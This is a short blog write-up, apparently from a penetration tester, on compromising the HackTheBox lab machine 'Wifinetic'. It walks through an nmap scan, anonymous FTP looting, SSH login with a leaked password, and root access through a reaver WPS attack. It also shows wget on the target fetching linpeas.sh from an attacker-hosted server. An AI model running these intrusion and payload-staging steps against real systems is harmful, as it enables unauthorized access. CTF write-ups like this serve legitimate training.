HackTheBox Writeup- Wifinetic

moko55
5 min readSep 23, 2023

--

Table Of Contents :

Step1 : Enumeration

  • Nmap scan.
  • FTP server enumeration.

Step2 : Foothold

  • Data exposure leads to SSH connection.

Step3 : Privilege Escalation

  • using reaver wireless attack tool.

Step1 : Enumeration

using nmap tool to scan the ip address of the machine

# nmap -Pn 10.10.11.247  -sV -sC   

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.97
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
| -rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
| -rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)

53/tcp open tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

nmap scan revels that there is 3 open ports, port 21 for FTP service which nmap also reveled that it can be accessed anonymously, port 22 for SSH service and port 53 for DNS service.

first we try to connect to the FTP server of the target machine using any username and we are able to get the inside of the FTP server

inside the FTP server we find a file called “backup-OpenWrt-2023–07–26.tar” usually backup files contains important information that the user wants to backup in order to not lose it anytime.

so we download this file in our attacker machine using command :

ftp> mget backup-OpenWrt-2023-07-26.tar

or you can download all of the FTP files using one command :

# wget -r ftp://10.10.11.247

Step2 : Foothold

after unzipping the backup file we find a file which contains the WiFi password for SSID OpenWRT

so now we have a password but we need a username so we enumerate through the other files from the backup and we find the /etc/passwd folder which contains the usernames of the machine.

trying the password with the username “netadmin” we are able to connect via SSH using command :

 # ssh netadmin@10.10.11.247    //password :  VeRyUn!

and we are able to get the USER FLAG.

Step3 : Privilege Escalation

whenever you are in the target machine always use linpeas TOOL to see if any vulnerabilities exists in this machine using steps :

1- upload from the attack machine using command :

# python3 -m http.server 80

2- in the target machine run command :

# wget http://Your-IP:80/linpeas.sh

after running linpeas we find a very interesting thing which is reaver TOOL.

reaver is used as wireless attack tool which has full access over network sockets.

now we check the reaver tool and we get the description which is Reaver v1.6.5 WiFi Protected Setup Attack Tool

in order to use this tool we need the interface name and the bssid.

so we go to see the names of the wireless cards using command :

netadmin@wifinetic:/tmp$ iwlist scan

so now we have the bssid of the wireless card “wlan1”

bssid  :  02:00:00:00:00:00

having the interface which we want to see which is “mon0” and the bssid

we now use reaver TOOL using command :

netadmin@wifinetic:/tmp$ reaver -i mon0 -b 02:00:00:00:00:00

-i --> for the interface

-b --> for the bssid

from the output we get a new password so we use this password to change user to ROOT using command :

# su   // password : WhatIsReal!

and we are ROOT :

and we can get the ROOT flag

--

--

moko55

Penetration Tester | Pro-Hacker | CyberSecurity Engineer